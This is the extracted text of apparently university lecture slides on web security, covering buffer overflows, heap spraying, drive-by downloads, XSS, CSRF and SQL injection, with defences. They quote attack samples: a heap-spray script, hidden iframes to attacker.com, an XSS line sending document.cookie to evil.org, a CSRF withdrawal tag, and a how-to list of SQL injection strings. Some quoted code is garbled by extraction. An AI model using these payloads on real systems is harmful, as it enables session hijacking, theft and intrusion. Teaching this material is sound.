Title: Web Security
1- Web Security
- Dr. ? ? ?
- Department of Computer Science and Information
Engineering,National Central University
2 3Principle of Stack Smashing Attacks
- Overwritten control transfer structures, such as
return addresses or function pointers, to
redirect program execution flow to desired code. - Attack strings carry both code and address(es) of
the code entry point.
4A Linux Process Layout and Stack Operations
kernel address space
high address
main() G(1) void G(int a)
H(3) void H(int c)
Libraries heap BSS data code
env, argv, argc
main
stack
G
H
low address
5Explanation of BOAs (1)
G(int a) H(3) add_g H( int b) char
c100 int i0 while((cigetch())!EOF
)
Gs stack frame
b
return address add_g
Hs stack frame
address of Gs frame point
ebp
C99
0xabc
c b a
0xabb
C0
0xaba
Input String abc
i
esp
6Explanation of BOAs (2)
Length108 bytes
Attack String xxInjected Codexy0xabc
G(int a) H(3) add_g H( int b) char
c100 int i0 while((cigetch())!EOF
)
X 1 byte y 4 bytes
b
return address add_g
addrress oxabc
Hs stack frame
address of Gs frame point
y
ebp
C99
x
Injected Code
0xabc
0xabb
x x
C0
0xaba
i
esp
7Injected Code
- The attacked programs usually have root
privilege therefore, the injected code is
executed with root privilege. - The injected code is already in machine
instruction form therefore, a CPU can directly
execute it. - However the above fact also means that the
injected code must match the CPU type of the
attacked host. - Usually the injected code will fork a shell
hence, after an attack, an attacker could have a
root shell.
8- Heap Spray and Drive-by Download
9Heap SprayWikipediaNozzle
- Heap spraying is a technique used in exploits to
facilitate arbitrary code execution. - Heap spraying is a security threat using a
strategy of allocating many objects containing
the attackers exploit code in an applications
heap. - Heap spraying requires that an attacker use
another memory corruption exploit to trigger an
attack, but the act of spraying greatly
simplifies the attack and increases its
likelihood of success.
10Heap Spray Overview Puttaraksa
11Implementation - JavaScript
- Heap sprays for web browsers
- are commonly implemented in JavaScript
- and
- spray the heap by
- making copies of a long string
- and
- storing these strings in an array, up to the
point where enough memory has been sprayed to
cover the area that the exploit targets. - P.S. The long string begins with a NOP sled and
ends with shellcode.
12Implementation - ActionScript
- ActionScript
- In July 2009, exploits were found to be using
ActionScript to spray the heap in Adobe Flash.
13Implementation - Images
- Images
- Though it has been proven that heap-spraying can
be done through other means, for instance by
loading image files into the process, this has
not seen widespread use (as of August 2008).
14- Memory Corruption Exploit
15Sources of Memory Corruption Exploit
- Mishandling Tag Attribute Values
- Virtual Table
-
16Mishandling Tag Attribute Values (1)
- HTTP MS IE Malf. IFRAME/EMBED BO Symantec
- It is reported that an attacker can exploit this
condition by creating a malicious Web page
containing a malformed IFRAME, FRAME or EMBED
tag. - Specifically, the attacker creates the IFRAME,
FRAME or EMBED tag by specifying large string
values for the 'SRC' and 'NAME' properties. - These values are copied into finite sized process
buffers resulting in memory corruption.
17Mishandling Tag Attribute Values (2)Julam
- ltIFRAME SRCfile//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBB - BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBB -
-
-
- BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBB NAMECCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCC -
- CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCgt - lt/IFRAMEgt
- Result
- eip stops at address 0x769f682f
18Mishandling Tag Attribute Values (3)Julam
- memory new Array()
- for (i0ilt700i)
- memoryi block shellcode
19Virtual Table Foster et al.
- The virtual table is a lookup table of functions
used to resolve function calls in a dynamic/late
binding manner. - Class objects and structures are often stored on
the heap. - One field of a class object is a pointer to its
virtual table, called virtual-function table
pointer.
20Virtual Table Foster et al. Overview
__vptr
char a100
__vptr
char a100
21Virtual Table Ratanaworabhan et al. Spraying
the Heap
- ltSCRIPT language"text/javascript"gt
- shellcode unescape("u4343u4343...")
- oneblock unescape("u0D0Du0D0D")
- var fullblock oneblock
- while (fullblock.lengthlt0x40000)
- fullblock fullblock
-
- sprayContainer new Array()
- for (i0 ilt1000 i)
- sprayContaineri fullblock shellcode
-
- lt/SCRIPTgt
Shell Code
NOP Sled
22Result
- Because the size of the sprayed heap area may be
tens of MBs, ASLR may not work as expected.
23Drive-by Download Attacks wikipedia
- Download of spyware, a computer virus, or any
kind of malware that happens without knowledge of
the user. - Drive-by downloads may happen by
- visiting a website
- viewing an e-mail message
- or
- by clicking on a deceptive popup window.
24Clicking on a Deceptive Popup Window
- For instance, a user clicks on the window in the
mistaken belief - that it is an error report from his own PC
- or
- that it is an innocuous advertisement popup.
- In such cases, the "supplier" may claim that the
user "consented" to the download though he was
completely unaware of having initiated a
malicious software download.
25Drive-by Downloads using Web Pages
- Features
- Same appearance as the original webpage
- Secret downloads
- Automatic installation
- Based on vulnerabilities of browsers, plug-ins,
or OSes
26Client side
WWW
Good web server
Vulnerable browser
Malicious web server
bad.htm
attacker.com
ltiframe srchttp//attacker.com/bad.htm
height0 width0gt lt/iframegt ltscript
srchttp//attacker.com/bad.jsgtlt/scriptgt
27Client side
WWW
Good web server
Vulnerable browser
Malicious web server
bad.htm
attacker.com
document.write(unescape("3C73637269707420
6C616E67756167653D226A617661736372
697074223E0D0A6966286E61766967617
46F722E757365724167656E742E746F4C
6F7765724361736528292E696E6465784F
6628225C7836445C7837335C78
attacker2.com
28Discuss
- Why not inject shell code at the first stage?
(i.e. inject shell code to the good web server
directly)
29Drive-by Downloads
- Why Drive-by-Downloads?
- Deploy malware on computers of victims
- Large scale (vs. target attacks)
- Bypass firewalls or NAT protection
- Current solutions
- Static web-page analysis
- Web-sites reputation
- Microsoft Killbit
30 31HTTP Cookies
- HTTP cookies, sometimes known as web cookies or
just cookies, are parcels of text - sent by a server to a web browser
- and then sent back unchanged by the browser each
time it accesses that server - HTTP cookies are used for
- authenticating
- tracking
- maintaining specific information about users,
such as - site preferences
- the contents of their electronic shopping carts.
- The term "cookie" is derived from "magic cookie,"
a well-known concept in Unix computing which
inspired both the idea and the name of HTTP
cookies.
32Cookie Delivery
33Examine the Cookies
- Most browsers supporting JavaScript allow the
user to see the cookies that are active with
respect to a given page by typing
javascriptalert("Cookies "document.cookie) in
the browser URL field. - Some browsers incorporate a cookie manager for
the user to see and selectively delete the
cookies currently stored in the browser.
34Third-party Cookies
- While cookies are only sent to
- the server setting them
- or
- one in the same Internet domain,
- a Web page may contain images or other
components stored on servers in other domains. - Cookies that are set during retrieval of these
components are called third-party cookies.
35Using Third-party Cookies to Track a Users
Activity
- Advertising companies use third-party cookies to
track a user across multiple sites. - In particular, an advertising company can track a
user across all pages where it has placed
advertising images or Web bugs. - Knowledge of the pages visited by a user allows
the advertisement company to target advertisement
to the user's presumed preferences.
36Tracking Example
37Privacy Threat
- The possibility of building a profile of users
has been considered by some a potential privacy
threat, - even when the tracking is done on a single domain
- but especially when tracking is done across
multiple domains using third-party cookies. - For the above reason, some countries have
legislation about cookies.
38 39Categories
- Non-persistent XSS (Reflected XSS)
- the most common type nowadays
- Persistent XSS
40 41Through Hyperlinks
- An attacker may be able to embed their malicious
code within a hyperlink to the target site. When
the client web browser follows the link, the URL
sent to trusted.org includes malicious code. The
site (trusted.org) sends a page back to the
browser including the value of criteria without
validating user supplied input , which
consequently forces the execution of code from
the evil attackers server. - For example
- ltA HREF"http//trusted.org/search.cgi?criter
ialtSCRIPT SRC'http//evil.org/badkama.js'gtlt/SCRI
PTgt"gt Go to trusted.org lt/Agt - In the attack above, one source is inserting code
into pages sent by another source. - It should be noted that this attack disguises
the link as a link to http//trusted.org, can
be easily included in an HTML email message,
does not supply the malicious code inline, but is
downloaded from - http//evil.org. Thus the attacker
retains control of the script and can - update or remove the exploit code at
anytime.
Web browser
trusted.org
42Ways to Deploy Hyperlinks
- The user will most likely click on this link from
- another website,
- instant message,
- or
- simply just reading a web board or email message.
43Non-persistent Cross Site Scripting (XSS)
- A non-persistent cross-site scripting (XSS)
vulnerability is caused by the failure of an web
based application to validate user supplied input
before returning it to the client system. - By causing the victims browser to execute
injected code under the same permissions as the
web application domain, an attacker can bypass
the traditional Document Object Model (DOM)
security restrictions which can result in - cookie theft,
- account hijacking,
- changing of web application account settings,
- spreading of a webmail virus, etc.
44The Most Common Victims to Non-persistent XSS
- The most common web components that fall victim
to XSS vulnerabilities include - CGI scripts,
- search engines,
- interactive bulletin boards,
- and
- custom error pages with poorly written input
validation routines. - Additionally, a victim doesnt necessarily have
to click on a link XSS code can also be made to
load automatically in an HTML e-mail with certain
manipulations of the IMG or IFRAME HTML tags.
Each of these components could generate a web
page.
45Hijack Web Application Sessions
- The most popular XSS attack (and devastating) is
the harvesting of - authentication cookies
- and
- session management tokens.
- With this information, it is often a trivial
exercise for an attacker to hijack the victims
active session, completely bypassing the
authentication process.
46Traditional Non-persistent XSS Web Application
Hijack Scenario (1)
- The attacker investigates an interesting site
- that normal users must authenticate to gain
access to - and
- that tracks the authenticated user through the
use of cookies or session IDs - The attacker finds a XSS vulnerable page on the
site, for instance
http//trusted.org/account.asp. - Using a little social engineering,
- the attacker creates a special link to the site
- and
- embeds it in an HTML email that he sends to a
long list of potential victims.
47Traditional Non-persistent XSS Web Application
Hijack Scenario (2)
- Embedded within the special link are some coding
elements specially designed to transmit a copy of
the victims cookie back to the attacker. For
instance ltimg src"http//trusted.org/account.asp
?akltscriptgtdocument.location.replace('http//evil
.org/steal.cgi?'document.cookie) lt/scriptgt"gt - Unknown to the victim, the attacker has now
received a copy of their cookie information. - The attacker now visits the web site and, by
substituting his cookie information with that of
the victims, is now perceived to be the victim by
the server application.
48Traditional Non-persistent XSS Web Application
Hijack Steps David Endler
49- SOLUTIONS AND WORKAROUNDS David Endler
50For Users
- As a web application user, there are a few ways
to protect yourself from XSS attacks. - The first and most effective solution is to
disable all scripting language support in your
browser and email reader. - If this is not a feasible option for business
reasons, another recommendation is to use
reasonable caution when clicking links in
anonymous e-mails and dubious web pages.
51Web Application Developers and Vendors
- Web application developers and vendors should
ensure that all user input is parsed and filtered
properly. - User input includes
- things stored in GET Query strings,
- POST data,
- Cookies,
- URLs,
- and
- in general any persistent data that is
transmitted between the browser and web server.
52User Input Filtering
- The best philosophy to follow regarding user
input filtering is to deny all but a pre-selected
element set of benign characters in the web input
stream. - This prevents developers from having to
constantly predict and update all forms of
malicious input in order to deny only specific
characters (such as lt ? etc.). - Some decent guidelines for input filtering can be
found in the OWASP Requirements document OWASP
Guide to Building Secure Web Applications and Web
Services".
53Test
- Once an application has evolved out of the design
and development phases, it is important to
periodically test for XSS vulnerabilities since
application functionality is constantly changing
due to - upgrades
- integration of third party technologies
- decentralized website authoring
54Vulnerability Web Application Scanners
- Many web application vulnerability scanners start
to include checks for XSS. - The OWASP Testing group plans to produce a
methodology for checking XSS on a web
application. - Web Scarab
55Examples Used to Bypass Being Detected
56XSS Tool
57- Cross-site Request
- ForgeryWikipedia
58Definition
- Cross-site request forgery, also known as
one-click attack or session riding and
abbreviated as CSRF ("sea-surf") or XSRF, is a
type of malicious exploit of a website whereby
unauthorized commands are transmitted from a user
that the website trusts.
59Background
- CSRF vulnerabilities have been known and in some
cases exploited since the 1990s. - Because it is carried out from the user's IP
address, CSRF is untraceable without proper
logging.
60Impact
- As of 2007 there are few well-documented
examples. - About 18 million users of eBay's Internet Auction
Co. at Auction.co.kr in Korea lost personal
information in February 2008. - Customers of a bank in Mexico were attacked in
early 2008 with an image tag in email.
61Example
- One user, Bob, might be browsing a chat forum
where another user, Mallory, has posted a
message. - Suppose that Mallory has crafted an HTML image
element that references a script on Bob's bank's
website (rather than an image file), e.g., - ltimg src"http//bank.example/withdraw?accoun
tbobamount1000000formallory"gt - If Bob's bank keeps his authentication
information in a cookie - and
- if the cookie hasn't expired,
- then the attempt by Bob's browser to load the
image will submit the withdrawal form with his
cookie, thus authorizing a transaction without
Bob's approval.
62Common CSRF Characteristics
- Involve sites that rely on a user's identity
- Exploit the site's trust in that identity
- Trick the user's browser into sending HTTP
requests to a target site - Involve HTTP requests that have side effects
63Common CSRF Victims
- At risk are web applications that perform actions
based on input from trusted and authenticated
users without requiring the user to authorize the
specific action. - A user that is authenticated by a cookie saved in
his web browser could unknowingly send an HTTP
request to a site that trusts him and thereby
cause an unwanted action.
64Common CSRF Pitfalls
- CSRF attacks using images are often made from
Internet forums, where users are allowed to post
images but not JavaScript.
65CSRF Assumptions
- This attack relies on a few assumptions
- The attacker has knowledge of sites on which the
victim has current authentication (more common on
web forums, where this attack is most common) - The attacker's "target site" has authentication
cookies, or the victim has a current session
cookie with the target site - The "target site" doesn't have secondary
authentication for actions (such as form tokens)
66Example
- Assume a script in the document at
http//store.company.com/dir/other.html
executes the following statement - document.domain "company.com"
- After that statement executes, the page would
pass the origin check with http//company.com/dir/
page.html. - However, by the same reasoning, company.com could
not set document.domain to othercompany.com.
67Prevention
- For the web site, switching from
- a persistent authentication method (e.g.
a - cookie or HTTP authentication)
- to
- a transient authentication method (e.g. a
hidden - field provided on every form)
- will help prevent these attacks.
- hidden field of a form
- A similar approach is to include a secret,
user-specific token in forms that is verified in
addition to the cookie. - a field of a form filled out by a user
68 69What is SQL Injection?
- Many web pages take parameters from web users,
and make SQL query to the database. - Take for instance when a user login a web page,
the web page accepts that user name and password
and makes SQL query to the database to check if
the user has valid name and password. - With SQL Injection, it is possible for us to send
crafted user name and/or password field that will
change the SQL query and thus grant us something
else.
70SQL Injection Attack Channels
- SQL injection is one type of web hacking that
require nothing but port 80 and it might just
work even if the admin is patch-happy. - It attacks on the web application (like ASP, JSP,
PHP, CGI, etc) itself rather than on the web
server or services running in the OS.
71What You Should Look for?
- Try to look for pages that allow you to submit
data, i.e - login page,
- search page,
- feedback, etc.
- Sometimes, HTML pages use POST command to send
parameters to another ASP page. Therefore, you
may not see the parameters in the URL. However,
you can check the source code of the HTML, and
look for "FORM" tag in the HTML code. You may
find something like this in some HTML codes - ltFORM actionSearch/search.asp
methodpostgtltinput typehidden nameA
valueCgtlt/FORMgtEverything between the ltFORMgt
and lt/FORMgt has potential parameters that might
be useful (exploit wise).
72What If You Can't Find Any Page That Takes Input?
- You should look for pages like ASP, JSP, CGI, or
PHP web pages. - Try to look especially for URL that takes
parameters, likehttp//duck/index.asp?id10
73How Do You Test If It Is Vulnerable?
- Start with a single quote trick. Input something
likehi' or 11-- - into login, or password, or even in the URL.
- Example - Login hi' or 11-- - Pass hi' or
11-- - http//duck/index.asp?idhi' or 11 - If luck is on your side, you will get login
without any login name or password.
74Hidden Field
- If you must do this with a hidden field, just
download the source HTML from the site, save it
in your hard disk, modify the URL and hidden
field accordingly. - ExampleltFORM actionhttp//duck/Search/search.a
sp methodpostgtltinput typehidden nameA
value"hi' or 11--"gtlt/FORMgt
75Database Table ExampleCQU
76Database Table product
PName PCategory price number bar code
bread food 30 100 100-234-7
cake food 300 20 100-987-6
cookie food 50 70 100-812-9
model car toy 200 20 300-567-7
figure toy 300 80 300-987-9
paper stationery 0.5 5000 981-897-7
pen stationery 20 300 981-967-0
77Web Application Input and Its Corresponding SQL
Query
- Take an asp page that will link you to another
page with the following URLhttp//duck/index.as
p?categoryfoodIn the URL, 'category' is the
variable name, and 'food' is the value assigned
to the variable. In order to do that, an ASP
might contain the following codev_cat
request("category")sqlstr"SELECT FROM product
- WHERE PCategory'" v_cat "'"set
rsconn.execute(sqlstr)As we can see, our
variable will be wrapped into v_cat and thus the
SQL statement should becomeSELECT FROM
product WHERE PCategory'food'The query should
return a result set containing one or more rows
that match the WHERE condition, in this case,
'food'.
78Why ' or 11-- ?
- Now, assume that we change the URL into something
like thishttp//duck/index.asp?categoryfood'
or 11--Now, our variable v_cat equals to
"food' or 11-- ", if we substitute this in the
SQL query, we will have - SELECT
- FROM product
- WHERE PCategory'food' or 11--'The query
now should now select everything from the product
table regardless if PCategory is equal to 'food'
or not. - A double dash "--" tell MS SQL server ignore the
rest of the query, which will get rid of the last
hanging single quote ('). - Sometimes, it may be possible to replace double
dash with single hash "".
79Other Crafted Input (1)
- However, if it is not an SQL server, or you
simply cannot ignore the rest of the query, you
also may try' or 'a''aThe SQL query will now
become - SELECT
- FROM product
- WHERE PCategory'food' or 'a''a'It should
return the same result.
80Other Crafted Input (2)
- Depending on the actual SQL query, you may have
to try some of these possibilities' or 11--"
or 11--or 11--' or 'a''a" or "a""a') or
('a''a